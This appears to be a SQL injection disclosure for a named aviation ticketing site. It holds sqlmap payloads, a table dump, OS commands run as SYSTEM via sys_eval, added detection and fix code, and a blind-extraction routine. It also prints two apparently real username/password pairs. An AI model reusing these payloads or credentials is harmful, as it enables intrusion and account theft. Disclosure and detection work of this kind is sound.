Xiangpeng Aviation system SQL injection (OS commands can be run through sqlmap's sql-shell)
Injection point: http://**.**/web/Help.aspx?code=Private (injectable parameter: code)
sqlmap output:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=Private' AND 8659=8659 AND 'vmjH'='vmjH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 13 columns
    Payload: code=-2518' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162717371,0x5452704744716a5a6b64,0x7165796471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: code=Private'; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: code=Private' AND SLEEP(5) AND 'oGRy'='oGRy
---
[15:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[15:52:34] [INFO] testing if current user is DBA
[15:52:34] [INFO] fetching current user
current user is DBA: True
Database: ticketdb
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| npc_sys_action_log       |    8062 |
| shop_commodity_price     |    2556 |
| shop_order_item          |    2048 |
| shop_address             |    1477 |
| shop_order               |    1210 |
| npc_sys_action_detail    |     978 |
| shop_commodity           |     874 |
| shop_commodity_detail    |     603 |
| npc_sys_authorization    |     320 |
| shop_packages            |     305 |
| npc_sys_member_data      |     189 |
| npc_sys_member_info      |     175 |
| shop_cart                |     144 |
| npc_dict_item            |     102 |
| npc_sys_menu             |      35 |
| npc_sys_user_data        |      23 |
| npc_sys_user_info        |      22 |
| npc_sys_config           |      11 |
| npc_dict_group           |      10 |
| npc_info_group           |       8 |
| npc_sys_link_user_role   |       8 |
| npc_info_content_page    |       7 |
| shop_category            |       5 |
| npc_sys_role_info        |       3 |
| info_adv                 |       2 |
+--------------------------+---------+

Database: performance_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name       |    5520 |
| events_statements_summary_by_thread_by_event_name  |    3300 |
| events_stages_summary_by_thread_by_event_name      |    2160 |
| events_statements_summary_by_digest                |    1311 |
| events_waits_summary_by_account_by_event_name      |     552 |
| events_waits_summary_by_host_by_event_name         |     552 |
| events_waits_summary_by_user_by_event_name         |     552 |
| setup_instruments                                  |     552 |
| events_statements_summary_by_account_by_event_name |     330 |
| events_statements_summary_by_host_by_event_name    |     330 |
| events_statements_summary_by_user_by_event_name    |     330 |
| events_waits_summary_global_by_event_name          |     276 |
| events_stages_summary_by_account_by_event_name     |     216 |
| events_stages_summary_by_host_by_event_name        |     216 |
| events_stages_summary_by_user_by_event_name        |     216 |
| table_io_waits_summary_by_index_usage              |     185 |
| events_waits_summary_by_instance                   |     180 |
| file_instances                                     |     180 |
| events_statements_summary_global_by_event_name     |     165 |
| file_summary_by_instance                           |     151 |
| objects_summary_global_by_type                     |     124 |
| table_io_waits_summary_by_table                    |     124 |
| table_lock_waits_summary_by_table                  |     124 |
| events_stages_summary_global_by_event_name         |     108 |
| file_summary_by_event_name                         |      42 |
| threads                                            |      20 |
| setup_consumers                                    |      12 |
| session_account_connect_attrs                      |       8 |
| session_connect_attrs                              |       8 |
| performance_timers                                 |       5 |
| setup_objects                                      |       4 |
| setup_timers                                       |       4 |
| socket_summary_by_event_name                       |       3 |
| accounts                                           |       2 |
| hosts                                              |       2 |
| users                                              |       2 |
| events_statements_current                          |       1 |
| setup_actors                                       |       1 |
+----------------------------------------------------+---------+
Admin and ordinary user passwords are stored in plain text.
Logged in with two of them:
18687818813/pm110110
An online game account that holds many orders: xyw123/xyw36369
UDF privilege escalation is possible on this system; since port 3389 (RDP) is not open, I did not take it any further.
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[16:40:07] [INFO] testing if current user is DBA
[16:40:07] [INFO] fetching current user
current user is DBA: True
[16:40:07] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> sys_eval('whoami')
[16:40:10] [INFO] fetching SQL query output: 'sys_eval('whoami')'
sys_eval('whoami'): 'nt authority\\system'
sql-shell> sys_eval('ipconfig')
[16:40:13] [INFO] fetching SQL query output: 'sys_eval('ipconfig')'
[16:40:13] [WARNING] possible server trimmed output detected (probably due to its length and/or content)
[16:40:13] [INFO] retrieving the length of query output
[16:40:13] [INFO] retrieved: 355
[... several minutes of character-by-character blind retrieval progress lines omitted ...]
sys_eval('ipconfig'):

Windows IP Configuration


Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : **.**.**.**
   Subnet Mask . . . . . . . . . . . : **.**.**.**
   Default Gateway . . . . . . . . . : **.**.**.**

Ethernet adapter 本地连接 2:

   Media State . . . . . . . . . . . : Media disconnected

(The adapter name came back as the escaped bytes \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3, which is GBK for 本地连接, "Local Area Connection". The whoami result matters more than the addresses: mysqld runs as NT AUTHORITY\SYSTEM, so anything executed through the UDF runs as SYSTEM.)
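The defender's side of the same traffic, as an added example that is not part of the original report: detection logic that reads IIS 6.0 W3C log lines and flags the payload types sqlmap reported above (boolean-based blind, UNION, stacked queries, SLEEP-based timing) plus the sys_eval UDF call from the sql-shell session and sqlmap's CONCAT(0x...) boundary marker. The log excerpt is constructed for the example: the query strings are the report's own payloads URL-encoded the way IIS logs them, while the dates, server IP, client IPs and User-Agent are invented, and the default IIS 6.0 field order is assumed. The regexes are this example's, not anything the page or sqlmap ships.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Detection rules: one per injection type sqlmap reported, plus the sys_eval
# UDF call (lib_mysqludf_sys) and sqlmap's CONCAT(0x..) marker. Example regexes.
RULES = [
    ("boolean-blind", re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("union-query",   re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("stacked",       re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|CREATE|DROP)\b", re.I)),
    ("time-based",    re.compile(r"\bSLEEP\s*\(", re.I)),
    ("udf-exec",      re.compile(r"\bsys_(eval|exec)\s*\(", re.I)),
    ("sqlmap-marker", re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I)),
]

# Default W3C extended field order on IIS 6.0 (assumed unchanged on this server).
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status"]

def parse_iis_line(line):
    """One W3C log line -> dict of fields, or None for directives/blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def classify_query(raw_query):
    """Names of the rules matching a cs-uri-query value. Decoded twice because
    scanners and proxies sometimes double-encode."""
    decoded = unquote_plus(unquote_plus(raw_query))
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """(c-ip, cs-uri-stem, matched rules) for every request that trips a rule."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        matches = classify_query(rec["cs-uri-query"])
        if matches:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], matches))
    return hits

def suspicious_ips(lines, threshold=3):
    """Client IPs with at least `threshold` flagged requests. sqlmap's blind
    extraction issues one request per bit of output, so a scan trips this fast."""
    counts = Counter(ip for ip, _, _ in scan(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed log excerpt: payloads are the ones sqlmap reported (URL-encoded as
# IIS logs them); dates, server IP, client IPs and User-Agent are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2015-06-01 15:52:30 10.0.0.5 GET /web/Help.aspx code=Private 80 - 198.51.100.7 Mozilla/5.0 200 0 0
2015-06-01 15:52:31 10.0.0.5 GET /web/Help.aspx code=Private%27%20AND%208659%3D8659%20AND%20%27vmjH%27%3D%27vmjH 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2015-06-01 15:52:32 10.0.0.5 GET /web/Help.aspx code=-2518%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7162717371%2C0x5452704744716a5a6b64%2C0x7165796471%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2015-06-01 15:52:33 10.0.0.5 GET /web/Help.aspx code=Private%27%3B%20SELECT%20SLEEP%285%29-- 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2015-06-01 15:52:39 10.0.0.5 GET /web/Help.aspx code=Private%27%20AND%20SLEEP%285%29%20AND%20%27oGRy%27%3D%27oGRy 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2015-06-01 16:40:10 10.0.0.5 GET /web/Help.aspx code=Private%27%20AND%20ORD%28MID%28%28SELECT%20sys_eval%28%27whoami%27%29%29%2C1%2C1%29%29%3E64%20AND%20%27oGRy%27%3D%27oGRy 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2015-06-01 16:41:00 10.0.0.5 GET /web/Help.aspx code=Public 80 - 198.51.100.7 Mozilla/5.0 200 0 0
"""

if __name__ == "__main__":
    for ip, stem, matches in scan(SAMPLE_LOG.splitlines()):
        print(ip, stem, ",".join(matches))
    print(suspicious_ips(SAMPLE_LOG.splitlines()))
```

The per-IP count is the more robust signal: a single regex can be evaded by encoding or comment tricks, but a blind extraction of a 355-byte ipconfig result, as in the session above, needs hundreds of requests to the same stem from the same client within minutes.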
Solution:
Filter the input properly: pass the code parameter to MySQL as a bound parameter (a MySqlCommand placeholder) instead of concatenating it into the SQL text, and, if the Help page only accepts a fixed set of codes, whitelist them.
Given what the injection exposed, also: run the web application's MySQL account without DBA privileges and without access to the UDF (remove the sys_eval function and the lib_mysqludf_sys library from the server); do not run mysqld as NT AUTHORITY\SYSTEM; and store admin and user passwords as salted hashes instead of plain text.
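An added example, not code from the report or from the Xiangpeng system, showing why the fix is a bound parameter rather than a character filter. The real Help.aspx query is not on the page; the shape "WHERE code='<input>'" is an assumption that matches the quote-prefixed payloads sqlmap found, and the tables, rows and password are constructed. sqlite3 stands in for MySQL so it runs offline; the boolean-based blind oracle and the character-by-character binary search are the same technique that produced the long "retrieved: ..." progress lines above (sqlite's length()/unicode()/substr() where MySQL has LENGTH()/ORD()/MID()).

```python
import sqlite3

# Constructed stand-in for the Help page's lookup table and a user table with a
# plain-text password, as on the page. Values are made up for the example.
SCHEMA = """
CREATE TABLE help  (code TEXT, title TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO help  VALUES ('Private', 'Private help'), ('Public', 'Public help');
INSERT INTO users VALUES ('admin', 'Passw0rd!');
"""

def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_vulnerable(conn, code):
    """Help.aspx as the payloads imply it: the value is spliced into the SQL text."""
    sql = "SELECT title FROM help WHERE code='" + code + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, code):
    """The fix: a bound parameter. The driver sends the value separately from the
    statement, so quotes, AND, UNION or ';' in it are just characters compared
    against the code column."""
    rows = conn.execute("SELECT title FROM help WHERE code=?", (code,))
    return [row[0] for row in rows]

def make_oracle(conn):
    """True/false oracle built from the page's boolean-based blind payload:
    the help row comes back only when the injected condition is true."""
    def oracle(condition):
        payload = "Private' AND " + condition + " AND 'vmjH'='vmjH"
        return len(lookup_vulnerable(conn, payload)) > 0
    return oracle

def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of the SQL expression `expr` using only the
    oracle: binary-search the length, then each character's code point
    (7 requests per character for ASCII)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length((%s))>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for i in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s),%d,1))>%d" % (expr, i, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)

if __name__ == "__main__":
    conn = connect()
    # Boolean-based blind: the row is returned for a true condition, not for a false one.
    print(lookup_vulnerable(conn, "Private' AND 8659=8659 AND 'vmjH'='vmjH"))
    print(lookup_vulnerable(conn, "Private' AND 8659=8660 AND 'vmjH'='vmjH"))
    # UNION: pull the plain-text password into the response
    # (the page's payload ends with MySQL's '#' comment; sqlite needs '--').
    print(lookup_vulnerable(conn, "-2518' UNION ALL SELECT username||':'||password FROM users--"))
    # Blind extraction for when the output is not reflected in the page.
    print(blind_extract(make_oracle(conn), "SELECT password FROM users WHERE username='admin'"))
    # The parameterized version treats the payload as a literal code value.
    print(lookup_parameterized(conn, "Private' AND 8659=8659 AND 'vmjH'='vmjH"))
```

Stripping or escaping quotes by hand ("filter") is fragile because every call site must get it right and numeric parameters need no quote at all; the parameterized query removes the class of bug instead of one payload.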